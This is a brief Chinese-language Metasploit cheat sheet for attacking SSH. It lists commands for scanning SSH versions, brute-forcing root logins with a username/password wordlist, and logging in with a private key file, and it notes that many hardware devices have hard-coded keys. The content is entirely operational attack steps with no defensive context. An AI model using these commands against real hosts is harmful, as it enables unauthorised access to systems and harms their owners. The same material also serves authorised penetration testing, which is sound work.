SSH版本扫描
use auxiliary/scanner/ssh/ssh_version
SSH密码爆破
use auxiliary/scanner/ssh/ssh_login
set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/
root_userpass.txt;set VERBOSE false ;run
USERPASS_FILE 就是每天payload都是一组帐号密码
SSH公钥登陆
使用公钥证书而不是密码登录
use auxiliary/scanner/ssh/ssh_login_pubkey
set KEY_FILE id_rsa;
set USERNAME root;
run
很多硬件的公钥证书是写死的